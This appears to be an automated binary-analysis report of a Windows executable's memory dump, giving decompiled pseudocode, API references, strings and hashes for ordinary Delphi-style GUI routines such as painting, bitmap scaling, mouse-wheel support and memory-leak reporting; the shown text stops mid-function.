CreateCompatibleDC.GDI32(00000000), ref: 00426C3B CreateCompatibleDC.GDI32(00000000), ref: 00426C45 GetObjectA.GDI32(?,00000018,?), ref: 00426C65 CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00426C7C GetDC.USER32(00000000), ref: 00426C88 CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00426CB5 ReleaseDC.USER32 ref: 00426CDB SelectObject.GDI32(?,?), ref: 00426CF6 SelectObject.GDI32(?,00000000), ref: 00426D05 StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 00426D31 SelectObject.GDI32(?,00000000), ref: 00426D3F SelectObject.GDI32(?,00000000), ref: 00426D4D DeleteDC.GDI32(?), ref: 00426D63 DeleteDC.GDI32(?), ref: 00426D6C

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch String ID: API String ID: 644427674-0 Opcode ID: 248f97220b1dff338e82754563a8b2f4f32af0637ae63b0437187d055089408d Instruction ID: f7b92c2e99590a9d5cfcba79e299e5576af21b756abce57799db81c34b4bedf2 Opcode Fuzzy Hash: 248f97220b1dff338e82754563a8b2f4f32af0637ae63b0437187d055089408d Instruction Fuzzy Hash: AC41F271F04219AFDB10EBE9D841FAFB7BCEB09704F524466B614F7281C67959108B68

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E004073BC(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) { intOrPtr* _v8; struct HWND__* _t19; int* _t20; int* _t26; int* _t27; _t26 = _t20; _t27 = __edx; _v8 = __eax; _t19 = FindWindowA("MouseZ", "Magellan MSWHEEL"); *_v8 = RegisterWindowMessageA("MSWHEEL_ROLLMSG"); *_t27 = RegisterWindowMessageA("MSH_WHEELSUPPORT_MSG"); *_t26 = RegisterWindowMessageA("MSH_SCROLL_LINES_MSG"); if( *_t27 == 0 || _t19 == 0) { *_a8 = 0; } else { *_a8 = SendMessageA(_t19, *_t27, 0, 0); } if( *_t26 == 0 || _t19 == 0) { *_a4 = 3; } else { *_a4 = SendMessageA(_t19, *_t26, 0, 0); } return _t19; } 0x004073c3 0x004073c5 0x004073c7 0x004073d9 0x004073e8 0x004073f4 0x00407400 0x00407405 0x00407424 0x0040740b 0x0040741b 0x0040741b 0x00407429 0x00407446 0x0040742f 0x0040743f 0x0040743f 0x00407453

APIs

FindWindowA.USER32 ref: 004073D4 RegisterWindowMessageA.USER32(MSWHEEL_ROLLMSG,MouseZ,Magellan MSWHEEL), ref: 004073E0 RegisterWindowMessageA.USER32(MSH_WHEELSUPPORT_MSG,MSWHEEL_ROLLMSG,MouseZ,Magellan MSWHEEL), ref: 004073EF RegisterWindowMessageA.USER32(MSH_SCROLL_LINES_MSG,MSH_WHEELSUPPORT_MSG,MSWHEEL_ROLLMSG,MouseZ,Magellan MSWHEEL), ref: 004073FB SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00407413 SendMessageA.USER32(00000000,?,00000000,00000000), ref: 00407437

Strings

Magellan MSWHEEL , xrefs: 004073CA MSH_WHEELSUPPORT_MSG , xrefs: 004073EA MSWHEEL_ROLLMSG , xrefs: 004073DB MouseZ , xrefs: 004073CF MSH_SCROLL_LINES_MSG , xrefs: 004073F6

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Window$Register$Send$Find String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ API String ID: 3569030445-3736581797 Opcode ID: 10a1feeb794df7440b17b8e63e4a13679fef9cef35fe56b70c938976079f5b51 Instruction ID: c9e55c20fdb79de714cfc477ac30daadf041c9ce3ed2a91509b04cc45838add5 Opcode Fuzzy Hash: 10a1feeb794df7440b17b8e63e4a13679fef9cef35fe56b70c938976079f5b51 Instruction Fuzzy Hash: 9A111F70A48305AFE710AF65CC81B66BBA8EF45714F204177F944AB3C1D6B86D418B6A

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 59%

E0042E248(void* __eax, void* __ecx, intOrPtr __edx) { intOrPtr _v8; struct HDC__* _v12; struct tagRECT _v28; struct tagRECT _v44; char _v56; char _v72; signed char _t43; signed int _t79; int _t80; int _t81; void* _t94; intOrPtr _t107; void* _t116; void* _t119; void* _t122; void* _t124; intOrPtr _t125; _t122 = _t124; _t125 = _t124 + 0xffffffbc; _t94 = __ecx; _v8 = __edx; _t116 = __eax; _t43 = GetWindowLongA(E004423F8(_v8), 0xffffffec); if((_t43 & 0x00000002) == 0) { return _t43; } else { GetWindowRect(E004423F8(_v8), &_v44); OffsetRect( &_v44, ~(_v44.left), ~(_v44.top)); _v12 = GetWindowDC(E004423F8(_v8)); _push(_t122); _push(0x42e3a3); _push( *[fs:edx]); *[fs:edx] = _t125; asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _t119 = _t116; if(_t94 != 0) { _t79 = GetWindowLongA(E004423F8(_v8), 0xfffffff0); if((_t79 & 0x00100000) != 0 && (_t79 & 0x00200000) != 0) { _t80 = GetSystemMetrics("true"); _t81 = GetSystemMetrics(3); InflateRect( &_v28, 0xfffffffe, 0xfffffffe); E004193B4(_v28.right - _t80, _v28.right, _v28.bottom - _t81, &_v72, _v28.bottom); asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _t119 = _t119; FillRect(_v12, &_v28, GetSysColorBrush(0xf)); } } ExcludeClipRect(_v12, _v44.left + 2, _v44.top + 2, _v44.right - 2, _v44.bottom - 2); E0042DDE4( &_v56, 2); E0042DD38(_t119, &_v56, _v12, 0, &_v44); _pop(_t107); *[fs:eax] = _t107; _push(0x42e3aa); return ReleaseDC(E004423F8(_v8), _v12); } } 0x0042e249 0x0042e24b 0x0042e251 0x0042e253 0x0042e256 0x0042e263 0x0042e26b 0x0042e3b0 0x0042e271 0x0042e27e 0x0042e293 0x0042e2a6 0x0042e2ab 0x0042e2ac 0x0042e2b1 0x0042e2b4 0x0042e2be 0x0042e2bf 0x0042e2c0 0x0042e2c1 0x0042e2c2 0x0042e2c5 0x0042e2d2 0x0042e2dc 0x0042e2e7 0x0042e2f0 0x0042e2ff 0x0042e319 0x0042e325 0x0042e326 0x0042e327 0x0042e328 0x0042e329 0x0042e33a 0x0042e33a 0x0042e2dc 0x0042e35f 0x0042e36b 0x0042e37e 0x0042e385 0x0042e388 0x0042e38b 0x0042e3a2 0x0042e3a2

APIs

GetWindowLongA.USER32 ref: 0042E263 GetWindowRect.USER32 ref: 0042E27E OffsetRect.USER32(?,?,?), ref: 0042E293 GetWindowDC.USER32(00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0042E2A1 GetWindowLongA.USER32 ref: 0042E2D2 GetSystemMetrics.USER32 ref: 0042E2E7 GetSystemMetrics.USER32 ref: 0042E2F0 InflateRect.USER32(?,000000FE,000000FE), ref: 0042E2FF GetSysColorBrush.USER32(0000000F), ref: 0042E32C FillRect.USER32 ref: 0042E33A ExcludeClipRect.GDI32(?,?,?,?,?,00000000,0042E3A3,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0042E35F ReleaseDC.USER32 ref: 0042E39D

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$Window$LongMetricsSystem$BrushClipColorExcludeFillInflateOffsetRelease String ID: API String ID: 19621357-0 Opcode ID: b5feca34c5e02f2c05eb31ab0b62325e3b1cc387764e0298675f37e714cee0b3 Instruction ID: 957c21c96a165308dc8ebfbd5cc34ddb946f70638fe63c8bb3f5cff5665369c4 Opcode Fuzzy Hash: b5feca34c5e02f2c05eb31ab0b62325e3b1cc387764e0298675f37e714cee0b3 Instruction Fuzzy Hash: 71413371E04119ABDB00EBA9DD42EDFB7BDEF49314F500166F914F7281CA79AE018764

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 98%

E0040262C(void* __eax, void* __fp0) { void* _v8; char _v110600; char _v112644; char _v112645; signed int _v112652; char _v112653; char _v112654; char _v112660; intOrPtr _v112664; intOrPtr _v112668; intOrPtr _v112672; struct HWND__* _v112676; signed short* _v112680; intOrPtr* _v112684; char _v129068; char _v131117; char _v161836; void* _v162091; signed char _v162092; void* _t73; int _t79; signed int _t126; int _t131; intOrPtr _t132; char* _t134; char* _t135; char* _t136; char* _t137; char* _t138; char* _t139; char* _t141; char* _t142; char* _t147; char* _t148; intOrPtr _t180; void* _t182; void* _t184; void* _t185; intOrPtr* _t188; intOrPtr* _t189; signed int _t194; void* _t197; void* _t198; void* _t211; _push(__eax); _t73 = 0x27; goto L1; L12: while(_t180 != 0x463708) { _t79 = E00402144(_t180); _t131 = _t79; __eflags = _t131; if(_t131 == 0) { L11: _t180 = *((intOrPtr*)(_t180 + 4)); continue; } else { goto L4; } do { L4: _t194 = *(_t131 - 4); __eflags = _t194 & 0x00000001; if((_t194 & 0x00000001) == 0) { __eflags = _t194 & 0x00000004; if(__eflags == 0) { __eflags = _v112652 - 0x1000; if(_v112652 < 0x1000) { _v112664 = (_t194 & 0xfffffff0) - 4; _t126 = E00402488(_t131); __eflags = _t126; if(_t126 == 0) { _v112645 = 0; *((intOrPtr*)(_t197 + _v112652 * 4 - 0x1f828)) = _v112664; _t18 = &_v112652; *_t18 = _v112652 + 1; __eflags = *_t18; } } } else { E004024E0(_t131, __eflags, _t197); } } _t79 = E00402120(_t131); _t131 = _t79; __eflags = _t131; } while (_t131 != 0); goto L11; } _t132 = *0x4657b0; // 0x4657ac while(_t132 != 0x4657ac && _v112652 < 0x1000) { _t79 = E00402488(_t132 + 0x10); __eflags = _t79; if(_t79 == 0) { _v112645 = 0; _t22 = _t132 + 0xc; // 0x0 _t79 = _v112652; *((intOrPtr*)(_t197 + _t79 * 4 - 0x1f828)) = ( *_t22 & 0xfffffff0) - 0xfffffffffffffff4; _t27 = &_v112652; *_t27 = _v112652 + 1; __eflags = *_t27; } _t29 = _t132 + 4; // 0x4657ac _t132 = *_t29; } if(_v112645 != 0) { L48: return _t79; } _v112653 = 0; _v112668 = 0; _t134 = E004022DC(0x28, &_v161836); _v112660 = 0x37; _v112680 = 0x46103e; _v112684 = &_v110600; do { _v112672 = ( *_v112680 & 0x0000ffff) - 4; _v112654 = 0; _t182 = 0xff; _t188 = _v112684; while(_t134 <= &_v131117) { if( *_t188 > 0) { if(_v112653 == 0) { _t134 = E004022DC(0x27, _t134); _v112653 = 1; } if(_v112654 != 0) { *_t134 = 0x2c; _t139 = _t134 + 1; *_t139 = 0x20; _t140 = _t139 + 1; __eflags = _t139 + 1; } else { *_t134 = 0xd; *((char*)(_t134 + 1)) = 0xa; _t147 = E004021C0(_v112668 + 1, _t134 + 2); *_t147 = 0x20; _t148 = _t147 + 1; *_t148 = 0x2d; *((char*)(_t148 + 1)) = 0x20; _t140 = E004022DC(8, E004021C0(_v112672, _t148 + 2)); _v112654 = 1; } _t211 = _t182 - 1; if(_t211 < 0) { _t141 = E004022DC(7, _t140); } else { if(_t211 == 0) { _t141 = E004022DC(6, _t140); } else { E00403808( *((intOrPtr*)(_t188 - 4)), &_v162092); _t141 = E004022DC(_v162092 & 0x000000ff, _t140); } } *_t141 = 0x20; _t142 = _t141 + 1; *_t142 = 0x78; *((char*)(_t142 + 1)) = 0x20; _t134 = E004021C0( *_t188, _t142 + 2); } _t182 = _t182 - 1; _t188 = _t188 - 8; if(_t182 != 0xffffffff) { continue; } else { goto L37; } } L37: _v112668 = _v112672; _v112684 = _v112684 + 0x800; _v112680 = &(_v112680[0x10]); _t60 = &_v112660; *_t60 = _v112660 - 1; } while ( *_t60 != 0); if(_v112652 <= 0) { L47: E004022DC(3, _t134); _t79 = MessageBoxA(0, &_v161836, "Unexpected Memory Leak", 0x2010); goto L48; } if(_v112653 != 0) { *_t134 = 0xd; _t136 = _t134 + 1; *_t136 = 0xa; _t137 = _t136 + 1; *_t137 = 0xd; _t138 = _t137 + 1; *_t138 = 0xa; _t134 = _t138 + 1; } _t134 = E004022DC(0x3c, _t134); _t184 = _v112652 - 1; if(_t184 >= 0) { _t185 = _t184 + 1; _v112676 = 0; _t189 = &_v129068; L43: L43: if(_v112676 != 0) { *_t134 = 0x2c; _t135 = _t134 + 1; *_t135 = 0x20; _t134 = _t135 + 1; } _t134 = E004021C0( *_t189, _t134); if(_t134 > &_v131117) { goto L47; } _v112676 = &(_v112676->i); _t189 = _t189 + 4; _t185 = _t185 - 1; if(_t185 != 0) { goto L43; } } L1: _t198 = _t198 + 0xfffff004; _push(_t73); _t73 = _t73 - 1; if(_t73 != 0) { goto L1; } else { E00403264( &_v112644, 0x1b800); E00403264( &_v129068, 0x4000); _t79 = 0; _v112652 = 0; _v112645 = 1; _t180 = *0x46370c; // 0x26c0000 goto L12; } } 0x0040262f 0x00402630 0x00402630 0x00000000 0x0040270b 0x0040268b 0x00402690 0x00402692 0x00402694 0x00402708 0x00402708 0x00000000 0x00000000 0x00000000 0x00000000 0x00402696 0x00402696 0x0040269b 0x0040269d 0x004026a3 0x004026a5 0x004026ab 0x004026b8 0x004026c2 0x004026ca 0x004026d2 0x004026d7 0x004026d9 0x004026db 0x004026ee 0x004026f5 0x004026f5 0x004026f5 0x004026f5 0x004026d9 0x004026ad 0x004026b0 0x004026b5 0x004026ab 0x004026fd 0x00402702 0x00402704 0x00402704 0x00000000 0x00402696 0x00402717 0x00402756 0x00402724 0x00402729 0x0040272b 0x0040272d 0x00402734 0x00402740 0x00402746 0x0040274d 0x0040274d 0x0040274d 0x0040274d 0x00402753 0x00402753 0x00402753 0x00402771 0x004029cf 0x004029d5 0x004029d5 0x00402777 0x00402780 0x0040279b 0x0040279d 0x004027a7 0x004027b7 0x004027bd 0x004027c9 0x004027cf 0x004027d6 0x004027e1 0x004027e3 0x004027f4 0x00402801 0x00402814 0x00402816 0x00402816 0x00402824 0x00402875 0x00402878 0x00402879 0x0040287c 0x0040287c 0x00402826 0x00402826 0x0040282a 0x0040283c 0x0040283e 0x00402841 0x00402842 0x00402846 0x0040286a 0x0040286c 0x0040286c 0x0040287f 0x00402882 0x00402899 0x00402884 0x00402884 0x004028ae 0x00402886 0x004028bb 0x004028d4 0x004028d4 0x00402884 0x004028d6 0x004028d9 0x004028da 0x004028de 0x004028eb 0x004028eb 0x004028ed 0x004028ee 0x004028f4 0x00000000 0x00000000 0x00000000 0x00000000 0x004028f4 0x004028fa 0x00402900 0x00402906 0x00402910 0x00402917 0x00402917 0x00402917 0x0040292a 0x004029a6 0x004029b2 0x004029ca 0x00000000 0x004029ca 0x00402933 0x00402935 0x00402938 0x00402939 0x0040293c 0x0040293d 0x00402940 0x00402941 0x00402944 0x00402944 0x00402956 0x0040295e 0x00402961 0x00402963 0x00402964 0x0040296e 0x00000000 0x00402974 0x0040297b 0x0040297d 0x00402980 0x00402981 0x00402984 0x00402984 0x0040298e 0x00402998 0x00000000 0x00000000 0x0040299a 0x004029a0 0x004029a3 0x004029a4 0x00000000 0x00000000 0x004029a4 0x00402635 0x00402635 0x0040263b 0x0040263c 0x0040263d 0x00000000 0x0040263f 0x00402658 0x0040266a 0x0040266f 0x00402671 0x00402677 0x0040267e 0x00000000 0x0040267e

APIs

MessageBoxA.USER32 ref: 004029CA

Strings

7 , xrefs: 0040279D bytes: , xrefs: 00402859 The unexpected small block leaks are: , xrefs: 00402803 String , xrefs: 0040289D Unknown , xrefs: 00402888 , xrefs: 00402910 An unexpected memory leak has occurred. , xrefs: 0040278C The sizes of unexpected leaked medium and large blocks are: , xrefs: 00402945 Unexpected Memory Leak , xrefs: 004029BC

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Message String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown API String ID: 2030045667-32948583 Opcode ID: beafdac069818b89e0087070b96c1ea8355f0caf45c0914c33fec503f38985e1 Instruction ID: 23a8accc11e2490a14215b8d9e6836f2a0164065a38b33aa7325ad77d19b5dc4 Opcode Fuzzy Hash: beafdac069818b89e0087070b96c1ea8355f0caf45c0914c33fec503f38985e1 Instruction Fuzzy Hash: 14A1D930B042548BDF21AA2DC988BD976E5EB09314F1441FAE449BB3C2DBFD89C5CB59

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 88%

E0042328C(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) { struct tagPOINT _v12; int _v16; struct tagRECT _v32; struct tagRECT _v48; void* __ebx; void* __edi; void* __esi; void* __ebp; void* _t60; int _t61; RECT* _t64; struct HDC__* _t65; _t64 = _a8; _t65 = _a4; if( *0x46633f != 0) { _t61 = 0; if(_a12 == 0) { L14: return _t61; } _v32.left = 0; _v32.top = 0; _v32.right = GetSystemMetrics(0); _v32.bottom = GetSystemMetrics(1); if(_t65 == 0) { if(_t64 == 0 || IntersectRect( &_v32, &_v32, _t64) != 0) { L13: _t61 = _a12(0x12340042, _t65, &_v32, _a16); } else { _t61 = 1; } goto L14; } _v16 = GetClipBox(_t65, &_v48); if(GetDCOrgEx(_t65, &_v12) == 0) { goto L14; } OffsetRect( &_v32, ~(_v12.x), ~(_v12.y)); if(IntersectRect( &_v32, &_v32, &_v48) == 0 || _t64 != 0) { if(IntersectRect( &_v32, &_v32, _t64) != 0) { goto L13; } if(_v16 == 1) { _t61 = 1; } goto L14; } else { goto L13; } } *0x46632c = E00422CE4(7, _t60, *0x46632c, _t64, _t65); _t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16); goto L14; } 0x00423295 0x00423298 0x004232a2 0x004232d2 0x004232d8 0x00423394 0x0042339c 0x0042339c 0x004232e0 0x004232e5 0x004232f0 0x004232fb 0x00423300 0x00423369 0x00423381 0x00423392 0x0042337d 0x0042337d 0x0042337d 0x00000000 0x00423369 0x0042330c 0x0042331b 0x00000000 0x00000000 0x0042332d 0x00423345 0x0042335b 0x00000000 0x00000000 0x00423361 0x00423363 0x00423363 0x00000000 0x00000000 0x00000000 0x00000000 0x00423345 0x004232b6 0x004232cb 0x00000000

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 004232C5 GetSystemMetrics.USER32 ref: 004232EA GetSystemMetrics.USER32 ref: 004232F5 GetClipBox.GDI32(?,?), ref: 00423307 GetDCOrgEx.GDI32(?,?), ref: 00423314 OffsetRect.USER32(?,?,?), ref: 0042332D IntersectRect.USER32 ref: 0042333E IntersectRect.USER32 ref: 00423354 Part of subcall function 00422CE4: GetProcAddress.KERNEL32(768F0000,00000000), ref: 00422D63

Strings

EnumDisplayMonitors , xrefs: 004232A4

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc String ID: EnumDisplayMonitors API String ID: 362875416-2491903729 Opcode ID: f7d0f23d6495af1ec55020b5116113e54d63a9552e5b96eaa14a23c035d380cf Instruction ID: d52a89dab7af035f148b809b0392693c774d2fc3562edf481713e1b8ae1df2d7 Opcode Fuzzy Hash: f7d0f23d6495af1ec55020b5116113e54d63a9552e5b96eaa14a23c035d380cf Instruction Fuzzy Hash: 82312C72E04219AFDB10DFA598449EFB7BCAB09315F40412BFD11E2241EB7CDB018BA9

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 88%

E004403A0(intOrPtr* __eax, void* __edx) { struct HDC__* _v8; struct HBITMAP__* _v12; void* _v16; struct tagPAINTSTRUCT _v80; int _v84; void* _v96; int _v104; void* _v112; void* __ebx; void* __edi; void* __esi; void* __ebp; void* _t38; struct HDC__* _t59; intOrPtr* _t88; intOrPtr _t107; void* _t108; struct HDC__* _t110; void* _t113; void* _t116; void* _t118; intOrPtr _t119; _t116 = _t118; _t119 = _t118 + 0xffffff94; _push(_t108); _t113 = __edx; _t88 = __eax; if( *((char*)(__eax + 0x240)) == 0 || *((intOrPtr*)(__edx + 4)) != 0) { if(( *(_t88 + 0x55) & 0x00000001) != 0 || E0043E7F4(_t88) != 0) { _t38 = E0043FDA8(_t88, _t88, _t113, _t108, _t113); } else { _t38 = *((intOrPtr*)( *_t88 - 0x10))(); } return _t38; } else { _t110 = GetDC(0); *((intOrPtr*)( *_t88 + 0x44))(); *((intOrPtr*)( *_t88 + 0x44))(); _v12 = CreateCompatibleBitmap(_t110, _v104, _v84); ReleaseDC(0, _t110); _v8 = CreateCompatibleDC(0); _v16 = SelectObject(_v8, _v12); *[fs:eax] = _t119; _t59 = BeginPaint(E004423F8(_t88), &_v80); E0043BC9C(_t88, _v8, 0x14, _v8); *((intOrPtr*)(_t113 + 4)) = _v8; E004403A0(_t88, _t113); *((intOrPtr*)(_t113 + 4)) = 0; *((intOrPtr*)( *_t88 + 0x44))( *[fs:eax], 0x4404f2, _t116); *((intOrPtr*)( *_t88 + 0x44))(); BitBlt(_t59, 0, 0, _v104, _v84, _v8, 0, 0, 0xcc0020); EndPaint(E004423F8(_t88), &_v80); _pop(_t107); *[fs:eax] = _t107; _push(0x4404f9); SelectObject(_v8, _v16); DeleteDC(_v8); return DeleteObject(_v12); } } 0x004403a1 0x004403a3 0x004403a8 0x004403a9 0x004403ab 0x004403b4 0x004403c0 0x004403df 0x004403cd 0x004403d3 0x004403d3 0x004404ff 0x004403e9 0x004403f0 0x004403f9 0x00440407 0x00440414 0x0044041a 0x00440426 0x00440436 0x00440444 0x00440453 0x00440468 0x00440470 0x00440477 0x0044047e 0x00440495 0x004404a3 0x004404af 0x004404c0 0x004404c7 0x004404ca 0x004404cd 0x004404da 0x004404e3 0x004404f1 0x004404f1

APIs

GetDC.USER32(00000000), ref: 004403EB CreateCompatibleBitmap.GDI32(00000000,?), ref: 0044040F ReleaseDC.USER32 ref: 0044041A CreateCompatibleDC.GDI32(00000000), ref: 00440421 SelectObject.GDI32(00000000,?), ref: 00440431 BeginPaint.USER32(00000000,?,00000000,004404F2,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00440453 BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 004404AF EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 004404C0 SelectObject.GDI32(00000000,?), ref: 004404DA DeleteDC.GDI32(00000000), ref: 004404E3 DeleteObject.GDI32(?), ref: 004404EC Part of subcall function 0043FDA8: BeginPaint.USER32(00000000,?), ref: 0043FDD3 Part of subcall function 0043FDA8: EndPaint.USER32(00000000,?,0043FF0E), ref: 0043FF01

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Paint$Object$BeginCompatibleCreateDeleteSelect$BitmapRelease String ID: API String ID: 3867285559-0 Opcode ID: eba5fdd7ba86c248c310541572c712ce7591c9252fd8a16b30174db8949f5770 Instruction ID: 4919ca747627bef7842d7ed575d7896ae0b3c9884536c9da749fdf441052b200 Opcode Fuzzy Hash: eba5fdd7ba86c248c310541572c712ce7591c9252fd8a16b30174db8949f5770 Instruction Fuzzy Hash: C1414171B00204AFDB10EFA9CD85F9EB7F8EF49704F10447ABA05EB281DA789D158B54

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E00437338(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) { char _v8; void* _t29; void* _t32; void* _t38; void* _t42; void* _t46; void* _t54; intOrPtr* _t65; _t65 = &_v8; _t29 = *0x462560; // 0x0 *((intOrPtr*)(_t29 + 0x1b4)) = _a4; if(IsWindowUnicode(_a4) == 0) { _t32 = *0x462560; // 0x0 SetWindowLongA(_a4, 0xfffffffc, *(_t32 + 0x1c0)); if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) { SetWindowLongA(_a4, 0xfffffff4, _a4); } } else { _t54 = *0x462560; // 0x0 SetWindowLongW(_a4, 0xfffffffc, *(_t54 + 0x1c0)); if((GetWindowLongW(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongW(_a4, 0xfffffff4) == 0) { SetWindowLongW(_a4, 0xfffffff4, _a4); } } _t38 = *0x462560; // 0x0 SetPropA(_a4, *0x466502 & 0x0000ffff, _t38); _t42 = *0x462560; // 0x0 SetPropA(_a4, *0x466500 & 0x0000ffff, _t42); _t46 = *0x462560; // 0x0 *0x462560 = 0; _v8 = *((intOrPtr*)(_t46 + 0x1c0))(_a4, _a8, _a12, _a16); return *_t65; } 0x0043733d 0x00437340 0x00437348 0x00437359 0x004373a4 0x004373b6 0x004373cb 0x004373e6 0x004373e6 0x0043735b 0x0043735b 0x0043736d 0x00437382 0x0043739d 0x0043739d 0x00437382 0x004373eb 0x004373fd 0x00437402 0x00437414 0x00437425 0x0043742a 0x0043743a 0x00437442

APIs

IsWindowUnicode.USER32(?), ref: 00437352 SetWindowLongW.USER32 ref: 0043736D GetWindowLongW.USER32(?,000000F0), ref: 00437378 GetWindowLongW.USER32(?,000000F4), ref: 0043738A SetWindowLongW.USER32 ref: 0043739D SetWindowLongA.USER32(?,000000FC,?), ref: 004373B6 GetWindowLongA.USER32 ref: 004373C1 GetWindowLongA.USER32 ref: 004373D3 SetWindowLongA.USER32(?,000000F4,?), ref: 004373E6 SetPropA.USER32 ref: 004373FD SetPropA.USER32 ref: 00437414

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$Prop$Unicode String ID: API String ID: 1693715928-0 Opcode ID: 9cb3877dccd50f0c78dc4fa0fa98952b877eedb7963e8443561684603e94e979 Instruction ID: 055e33e178d5362de7fb404685cd59e59f5cb0b042dc790f1cdf86eecf1274db Opcode Fuzzy Hash: 9cb3877dccd50f0c78dc4fa0fa98952b877eedb7963e8443561684603e94e979 Instruction Fuzzy Hash: 62316075608248BBDF10DFA9DD84E9A37ACBB08354F104266FD14DB2E1D378EA40CB65

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 82%

E0043EA40(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) { char _v68; struct _WNDCLASSA _v108; intOrPtr _v116; signed char _v137; void* _v144; struct _WNDCLASSA _v184; char _v188; char _v192; char _v196; int _t52; void* _t53; intOrPtr _t86; intOrPtr _t105; intOrPtr _t109; void* _t110; intOrPtr* _t112; void* _t116; _t110 = __edi; _t94 = __ebx; _push(__ebx); _push(__esi); _v196 = 0; _t112 = __eax; _push(_t116); _push(0x43ec01); _push( *[fs:eax]); *[fs:eax] = _t116 + 0xffffff40; *((intOrPtr*)( *__eax + 0x9c))(); if(_v116 != 0 || (_v137 & 0x00000040) == 0) { L7: *((intOrPtr*)(_t112 + 0x1a8)) = _v108.lpfnWndProc; _t52 = GetClassInfoA(_v108.hInstance, &_v68, &_v184); asm("sbb eax, eax"); _t53 = _t52 + 1; if(_t53 == 0 || E00437338 != _v184.lpfnWndProc) { if(_t53 != 0) { UnregisterClassA( &_v68, _v108.hInstance); } _v108.lpfnWndProc = E00437338; _v108.lpszClassName = 